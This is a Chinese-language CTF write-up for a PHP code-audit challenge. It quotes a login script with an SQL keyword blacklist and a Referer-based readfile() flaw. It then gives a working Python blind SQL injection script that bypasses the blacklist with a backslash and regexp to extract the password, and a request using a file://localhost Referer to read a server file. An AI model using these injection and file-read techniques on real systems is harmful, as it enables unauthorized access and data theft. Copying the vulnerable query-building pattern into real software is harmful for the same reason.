打开地址发现是一个登录页面,随便输入账号密码跳转到源码页面,是一道代码审计题,源码如下:
<?php include "config.php"; error_reporting(0); highlight_file(__FILE__); $check_list = "/into|load_file|0x|outfile|by|substr|base|echo|hex|mid|like|or|char|union|or|select|greatest|%00|_|\'|admin|limit|=_| |in|<|>|-|user|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep/i"; if(preg_match($check_list, $_POST['username'])){ die('<h1>Hacking first,then login!Username is very special.</h1>'); } if(preg_match($check_list, $_POST['passwd'])){ die('<h1>Hacking first,then login!No easy password.</h1>'); } $query="select user from user where user='$_POST[username]' and passwd='$_POST[passwd]'"; $result = mysql_query($query); $result = mysql_fetch_array($result); $passwd = mysql_fetch_array(mysql_query("select passwd from user where user='admin'")); if($result['user']){ echo "<h1>Welcome to CTF Training!Please login as role of admin!</h1>"; } if(($passwd['passwd'])&&($passwd['passwd'] === $_POST['passwd'])){ $url = $_SERVER["HTTP_REFERER"]; $parts = parse_url($url); if(empty($parts['host']) || $parts['host'] != 'localhost'){ die('<h1>The website only can come from localhost!You are not admin!</h1>'); } else{ readfile($url); } } ?>
其实就是怎么样绕过黑名单进行sql注入,注入脚本如下:
# -*- coding:utf-8 -*- import string import requests import re from urllib import unquote char_set = '0123456789abcdefghijklmnopqrstuvwxyz_' pw = '' while 1: for ch in char_set: url = 'http://47.102.127.194:8801/check.php' #print unquote('||passwd/**/regexp/**/"^'+pw+ch+'";%00') data = {"username":"\\","passwd":unquote('||passwd/**/regexp/**/"^'+pw+ch+'";%00')} r = requests.post(url=url,data=data) #print '||passwd/**/regexp/**/"^'+pw+ch+'";%%00' #print len(r.text) if 'Welcome to CTF Training!' in r.text: pw += ch print(pw) break if ch == '_': break
注入得到密码 d0itr1ght
然后进行登录 注意账号不能使用admin,随便用一个不再黑名单中的字符就行,登录后传入$_SERVER["HTTP_REFERER"]可以读取本地文件,但是host必须是localhost,方法如下:
url = 'http://47.102.127.194:8801/check.php' r = requests.post(url, data={"username": "1", "passwd": pw}, headers={"Referer": "file://localhost/var/www/html/flag.php"}) print r.text
flag{d0_1t_y0ur3elf}